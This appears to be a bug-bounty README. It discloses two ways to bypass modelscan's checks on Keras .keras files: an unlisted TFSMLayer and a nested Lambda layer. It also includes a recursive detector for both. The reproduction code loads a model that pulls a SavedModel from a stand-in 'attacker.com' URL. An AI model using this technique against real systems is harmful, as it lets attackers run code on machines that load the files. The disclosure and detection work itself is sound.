
Security Research: Keras .keras Format Vulnerability PoC

Proof-of-concept model files for huntr.com Model Format Vulnerability Program.

Findings

Finding 1: TFSMLayer Scanner Blind Spot (ACE)

Severity: Critical | Affects: modelscan 0.8.8 + keras 3.14.0 + tensorflow 2.21.0

modelscan.scanners.KerasLambdaDetectScan.unsafe_keras_operators does NOT include TFSMLayer.

A .keras file with TFSMLayer pointing to an attacker-controlled SavedModel URL passes ModelScan with 0 issues, then executes arbitrary code on keras.saving.load_model(safe_mode=False).

Root cause: TFSMLayer.__init__ calls tf.saved_model.load(filepath), where filepath is 100% attacker-controlled, read straight from config.json inside the .keras archive.

# Reproduction (live-confirmed on modelscan 0.8.8 + tensorflow 2.21.0)
from modelscan.modelscan import ModelScan
result = ModelScan().scan("tfsmlayer_rce.keras")
print(result["summary"]["total_issues"])   # 0 -- FALSE NEGATIVE!

# Load triggers RCE (with malicious SavedModel at attacker URL):
import keras
model = keras.saving.load_model("tfsmlayer_rce.keras", safe_mode=False)
# -> tf.saved_model.load("http://attacker.com/evil_savedmodel") -> code execution

Finding 2: Lambda Nested Sequential Bypass

_get_keras_operator_names() only walks top-level layers. A Lambda inside a Sequential that is itself nested in another Sequential is invisible to the scanner.

from modelscan.modelscan import ModelScan
result1 = ModelScan().scan("flat_lambda.keras")          # 1 issue DETECTED
result2 = ModelScan().scan("nested_lambda_bypass.keras")  # 0 issues BYPASSED
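As an added detection example (not code from this repository, modelscan, or keras), the recursive walk below covers both findings at once: it treats TFSMLayer as unsafe and descends into nested Sequential layers instead of stopping at the top level. The layer-config shape it matches on and the sample config are assumptions constructed for illustration.

```python
import json
import zipfile
from typing import Any, Iterator

# Hypothetical helper (added example, not part of modelscan or keras).
# TFSMLayer is the class modelscan's unsafe_keras_operators omits (Finding 1);
# Lambda is its existing check, which Finding 2 shows only covers top-level layers.
RISKY_CLASS_NAMES = {"Lambda", "TFSMLayer"}

def iter_layer_configs(node: Any) -> Iterator[dict]:
    """Yield every serialized-layer dict in a Keras config, at any depth.
    Nested models appear as {"class_name": "Sequential", "config": {"layers": [...]}},
    so the walk must recurse; a top-level pass misses the inner layers."""
    if isinstance(node, dict):
        if "class_name" in node and "config" in node:
            yield node
        for value in node.values():
            yield from iter_layer_configs(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_layer_configs(item)

def find_risky_layers(config: dict) -> list[tuple[str, str]]:
    """Return (class_name, module) for each risky layer found anywhere in the tree."""
    return [
        (layer["class_name"], layer.get("module", ""))
        for layer in iter_layer_configs(config)
        if layer["class_name"] in RISKY_CLASS_NAMES
    ]

def scan_keras_file(path: str) -> list[tuple[str, str]]:
    """A .keras file is a zip archive; config.json inside it holds the layer tree."""
    with zipfile.ZipFile(path) as zf:
        return find_risky_layers(json.loads(zf.read("config.json")))

# Constructed sample: Sequential -> Sequential -> {TFSMLayer, Lambda}, the nesting
# that Finding 2 says a top-level-only walk does not see. Placeholder filepath.
NESTED_CONFIG = {
    "class_name": "Sequential",
    "config": {"layers": [{
        "class_name": "Sequential",
        "config": {"layers": [
            {"class_name": "TFSMLayer", "module": "keras.layers",
             "config": {"filepath": "PLACEHOLDER_SAVEDMODEL_PATH"}},
            {"class_name": "Lambda", "module": "keras.layers", "config": {}},
        ]},
    }]},
}
```

Run `find_risky_layers(NESTED_CONFIG)` to see both nested layers reported, or point `scan_keras_file` at a real .keras archive to scan its config.json directly.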

Tested Environment

  • keras 3.14.0
  • modelscan 0.8.8
  • tensorflow-cpu 2.21.0
  • Python 3.12.12